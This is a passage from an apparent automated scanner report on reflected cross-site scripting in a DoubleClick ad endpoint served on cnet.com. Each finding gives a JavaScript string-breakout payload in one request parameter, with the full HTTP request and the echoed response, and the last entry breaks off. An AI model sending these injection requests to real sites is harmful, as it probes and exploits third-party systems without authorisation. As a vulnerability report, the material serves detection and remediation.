Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f831a"-alert(1)-"fd41ddc67fd was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comf831a"-alert(1)-"fd41ddc67fd&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
0686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comf831a"-alert(1)-"fd41ddc67fd&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId =
...[SNIP]...

3.143. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pdom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d8f4'-alert(1)-'4276b68460c was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com7d8f4'-alert(1)-'4276b68460c&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
0686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com7d8f4'-alert(1)-'4276b68460c&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.144. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cbc0"-alert(1)-"ba0ac0d227c was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6cbc0"-alert(1)-"ba0ac0d227c&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
1&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6cbc0"-alert(1)-"ba0ac0d227c&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1303848426617.uniqueId;
this.thirdPartyI
...[SNIP]...

3.145. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ec98'-alert(1)-'6c46995427c was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6ec98'-alert(1)-'6c46995427c&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
1&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6ec98'-alert(1)-'6c46995427c&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.146. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c129e'-alert(1)-'a18cc8e1ddf was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=c129e'-alert(1)-'a18cc8e1ddf&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=c129e'-alert(1)-'a18cc8e1ddf&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.2
...[SNIP]...

3.147. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49479"-alert(1)-"b2ea1892855 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=49479"-alert(1)-"b2ea1892855&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54536

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=49479"-alert(1)-"b2ea1892855&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.2
...[SNIP]...

3.148. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3537'-alert(1)-'9e6d81f8f7a was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100f3537'-alert(1)-'9e6d81f8f7a&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
kv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100f3537'-alert(1)-'9e6d81f8f7a&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/htt
...[SNIP]...

3.149. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f493"-alert(1)-"02b8d42dafa was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=1009f493"-alert(1)-"02b8d42dafa&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
kv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=1009f493"-alert(1)-"02b8d42dafa&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";

...[SNIP]...

3.150. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ppartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a9a7"-alert(1)-"ad0b1b525e8 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=1a9a7"-alert(1)-"ad0b1b525e8&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
02562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=1a9a7"-alert(1)-"ad0b1b525e8&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;

...[SNIP]...

3.151. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ppartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9df1a'-alert(1)-'d8d0b082069 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=9df1a'-alert(1)-'d8d0b082069&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

